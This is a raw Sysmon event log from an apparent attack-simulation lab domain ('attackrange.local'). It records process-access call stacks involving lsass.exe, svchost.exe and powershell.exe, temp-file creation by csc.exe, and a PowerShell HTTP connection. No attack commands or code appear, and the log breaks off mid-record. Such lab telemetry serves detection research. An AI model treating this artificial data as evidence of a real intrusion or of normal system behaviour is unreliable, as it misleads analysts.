13:30:23.482{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-476E-6000-3205-000000009A01}6624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000012437Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:23.279{08A6967A-476E-6000-3205-000000009A01}6624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_m3jz3rbk.gos.ps12021-01-14 13:30:23.279 10341000x800000000000000012436Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:23.263{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-476E-6000-3205-000000009A01}6624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012435Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:23.013{08A6967A-4755-6000-1B05-000000009A01}35803760C:\Windows\system32\rundll32.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+124a5|C:\Windows\System32\shell32.dll+43c6e|C:\Windows\System32\shell32.dll+eef32|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d18e|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6017|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012434Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:23.013{08A6967A-4755-6000-1B05-000000009A01}35803760C:\Windows\system32\rundll32.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+124a5|C:\Windows\System32\shell32.dll+43bd8|C:\Windows\System32\shell32.dll+eef32|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d18e|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6017|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012433Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:23.013{08A6967A-4755-6000-1B05-000000009A01}35803760C:\Windows\system32\rundll32.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+6422|C:\Windows\System32\shcore.dll+611d|C:\Windows\System32\shcore.dll+5ddd|C:\Windows\System32\shcore.dll+5d6f|C:\Windows\System32\shcore.dll+5c74|C:\Windows\System32\shell32.dll+43bba|C:\Windows\System32\shell32.dll+eef32|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d18e|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6017|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012432Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:23.013{08A6967A-4755-6000-1B05-000000009A01}35803760C:\Windows\system32\rundll32.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+60f4|C:\Windows\System32\shcore.dll+5ddd|C:\Windows\System32\shcore.dll+5d6f|C:\Windows\System32\shcore.dll+5c74|C:\Windows\System32\shell32.dll+43bba|C:\Windows\System32\shell32.dll+eef32|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d18e|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6017|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012431Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:23.013{08A6967A-4755-6000-1B05-000000009A01}35803760C:\Windows\system32\rundll32.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+6437|C:\Windows\System32\shcore.dll+6327|C:\Windows\System32\shcore.dll+629d|C:\Windows\System32\shcore.dll+61aa|C:\Windows\System32\shell32.dll+d001a|C:\Windows\System32\shell32.dll+ef204|C:\Windows\System32\shell32.dll+eee58|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d18e|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6017|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012430Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:23.013{08A6967A-4755-6000-1B05-000000009A01}35803760C:\Windows\system32\rundll32.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+6422|C:\Windows\System32\shcore.dll+611d|C:\Windows\System32\shcore.dll+5ddd|C:\Windows\System32\shcore.dll+5d6f|C:\Windows\System32\shcore.dll+5c74|C:\Windows\System32\shell32.dll+d0008|C:\Windows\System32\shell32.dll+ef204|C:\Windows\System32\shell32.dll+eee58|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d18e|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6017|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012429Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:23.013{08A6967A-4755-6000-1B05-000000009A01}35803760C:\Windows\system32\rundll32.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+60f4|C:\Windows\System32\shcore.dll+5ddd|C:\Windows\System32\shcore.dll+5d6f|C:\Windows\System32\shcore.dll+5c74|C:\Windows\System32\shell32.dll+d0008|C:\Windows\System32\shell32.dll+ef204|C:\Windows\System32\shell32.dll+eee58|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d18e|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6017|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000012449Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:23.110{08A6967A-476E-6000-3205-000000009A01}6624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-250.attackrange.local51787-false93.184.220.29-80http 10341000x800000000000000012478Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:25.857{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012477Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:25.857{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012476Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:25.857{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012475Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:25.857{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012474Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:25.857{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012473Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:25.857{08A6967A-4753-6000-0E05-000000009A01}23361952C:\Windows\system32\sihost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+1a0fc|C:\Windows\System32\modernexecserver.dll+1a09f|C:\Windows\System32\modernexecserver.dll+198f6|C:\Windows\System32\modernexecserver.dll+2c9d4|C:\Windows\System32\modernexecserver.dll+35efd|C:\Windows\System32\modernexecserver.dll+4d3a1|C:\Windows\System32\modernexecserver.dll+4d2bf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012472Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:25.857{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012471Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:25.857{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012470Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:25.857{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012469Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:25.857{08A6967A-4753-6000-0E05-000000009A01}23361952C:\Windows\system32\sihost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+23f30|C:\Windows\System32\modernexecserver.dll+43e70|C:\Windows\System32\modernexecserver.dll+3102d|C:\Windows\System32\modernexecserver.dll+30d24|C:\Windows\System32\modernexecserver.dll+17072|C:\Windows\System32\modernexecserver.dll+1d5d7|C:\Windows\SYSTEM32\ntdll.dll+3a950|C:\Windows\SYSTEM32\ntdll.dll+1e86f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000012468Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:30:25.686{08A6967A-4771-6000-3505-000000009A01}7120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\taelik12\taelik12.dll2021-01-14 13:30:25.404 10341000x800000000000000012467Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:25.623{08A6967A-476E-6000-3105-000000009A01}65806600C:\Windows\system32\conhost.exe{08A6967A-4771-6000-3605-000000009A01}7144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012466Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:25.623{08A6967A-4750-6000-0205-000000009A01}47883780C:\Windows\system32\csrss.exe{08A6967A-4771-6000-3605-000000009A01}7144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000012465Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:25.623{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012464Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:25.623{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012463Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 